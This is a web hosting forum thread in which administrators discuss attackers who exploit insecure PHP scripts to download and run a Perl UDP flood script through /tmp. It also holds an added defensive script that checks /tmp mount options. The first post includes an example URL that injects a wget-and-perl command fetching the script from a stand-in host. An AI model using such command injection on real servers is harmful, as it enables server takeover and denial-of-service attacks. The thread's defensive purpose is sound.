More /tmp Security Problems.

HostDime

Well-Known Member
PartnerNOC
Mar 15, 2003
Orlando, Florida
Now before anyone yells, all our servers have /tmp noexec,nosuid,nodev. This is all good for compiling, running programs, but here's the problem now... Many writers are writing insecure PHP journal scripts, and many other PHP programs which are vulnerable. Lately I saw udp.pl on a server when it was a little slow. It seems they had gotten the program installed via

http://userssite.com/index.php?x=cd /tmp;wget mysuperhackerpalace.com/udp.pl;/usr/bin/perl udp.pl 127.0.0.1

Now that's not the exact script, their site, and they didn't DDoS localhost. I'm giving everyone an idea. Now... anyone really poses a threat on your server now. Simple PHP shell + udp.pl = DDoS. And even if the person did not do it (the case with the insecure PHP script), every account poses a threat. I have basically just been searching logs and /tmp for any traces for now. What could be a fix on this? Could you somehow make perl not run scripts from tmp? Sigh.

:rolleyes:
 

Marty

Well-Known Member
Oct 10, 2001
mmm, that is interesting.

I think mod_security would probably deflect the request before they were able to upload. We just started running this on our servers.

www.modsecurity.org
 

jamesbond

Well-Known Member
Oct 9, 2002
If wget is not used by any users (except for root) then a simple fix would be to chmod wget to 700.
 

Silverado

Well-Known Member
Mar 19, 2003
Backyard - Poolside
Doesn't /scripts/securetmp take good care of this issue?

I used it on all my servers and it works great.
 

rs-freddo

Well-Known Member
May 13, 2003
Australia
cPanel Access Level: Root Administrator
If you use the securetmp system it basically stops:
/tmp/hacker.pl
from being executed
however it does not stop:
/usr/bin/perl /tmp/hacker.pl
why?
because in the first instance you are executing a script in /tmp
in the second instance you are executing software in /usr/bin and just parsing the file in /tmp.

This is why I'm pushing cPanel for a chrooted filesystem. Securetmp will only work for the REALLY DUMB hackers. Securetmp is only a very temporary bandaid.
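Two checks that follow from the first post and from the point above, written as an added example for this thread and not code from any of the posters: the first confirms from /proc/mounts that /tmp really carries noexec, nosuid and nodev; the second lists files under a directory whose first line is a #! line, which is exactly the class of file that noexec does not protect against once someone runs `/usr/bin/perl /tmp/file`. The mount tables in the block are constructed samples, not taken from a real server.

```shell
#!/bin/sh
# Added example, not code from this thread. Two defender-side checks:
#  1. tmp_mount_ok: confirm /tmp is a separate mount with noexec,nosuid,nodev,
#     reading text in /proc/mounts format.
#  2. list_interpreted_files: noexec only blocks direct execution, not
#     "/usr/bin/perl /tmp/file", so list files whose first line is a #! line
#     for manual review.
# The sample mount tables below are constructed, not from a real server.

# tmp_mount_ok MOUNTS_TEXT
#   MOUNTS_TEXT is the contents of /proc/mounts (device mountpoint fstype
#   options dump pass). Returns 0 when /tmp is a separate mount carrying
#   noexec, nosuid and nodev; 1 otherwise.
tmp_mount_ok() {
    opts=$(printf '%s\n' "$1" | awk '$2 == "/tmp" { print $4; exit }')
    [ -n "$opts" ] || return 1            # /tmp is not its own mount
    for want in noexec nosuid nodev; do
        case ",$opts," in
            *",$want,"*) ;;               # option present
            *) return 1 ;;                # option missing
        esac
    done
    return 0
}

# list_interpreted_files DIR
#   Prints "interpreter<TAB>path" for every regular file under DIR whose
#   first line starts with "#!". Output is for review; nothing is deleted.
list_interpreted_files() {
    find "$1" -type f 2>/dev/null | while IFS= read -r f; do
        first=$(head -n 1 "$f" 2>/dev/null)
        case "$first" in
            '#!'*) printf '%s\t%s\n' "${first#??}" "$f" ;;   # strip the "#!"
        esac
    done
}

# Constructed sample mount tables (one hardened, one not).
GOOD_SAMPLE='/dev/sda1 / ext3 rw 0 0
/dev/sda5 /tmp ext3 rw,noexec,nosuid,nodev 0 0'
WEAK_SAMPLE='/dev/sda1 / ext3 rw 0 0
/dev/sda5 /tmp ext3 rw,nosuid 0 0'

# report LABEL MOUNTS_TEXT -> prints an OK/WEAK verdict for the /tmp entry
report() {
    if tmp_mount_ok "$2"; then
        printf '%s: OK, /tmp has noexec,nosuid,nodev\n' "$1"
    else
        printf '%s: WEAK, /tmp lacks noexec/nosuid/nodev or is not a mount\n' "$1"
    fi
}

report "constructed good table" "$GOOD_SAMPLE"
report "constructed weak table" "$WEAK_SAMPLE"
```

On a live host run `report "this host" "$(cat /proc/mounts)"` and `list_interpreted_files /tmp`; the second command is the one that finds what the mount options alone cannot stop, since a #! file in /tmp is still runnable by naming the interpreter explicitly.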
 

Website Rob

Well-Known Member
Mar 23, 2002
Alberta, Canada
cPanel Access Level: Root Administrator
As security is done in layers, having safe_mode "ON" would have prevented the upload to 'tmp' and stopped the problem before it could start. Others may not agree with using this method, but I have found the majority of scripts (PHP) do not require it to be "OFF", and those that do make a request so it can be set up for their account.

Keeping track of who has safe_mode "OFF" makes it easy to track when 'tmp' is used for nefarious purposes.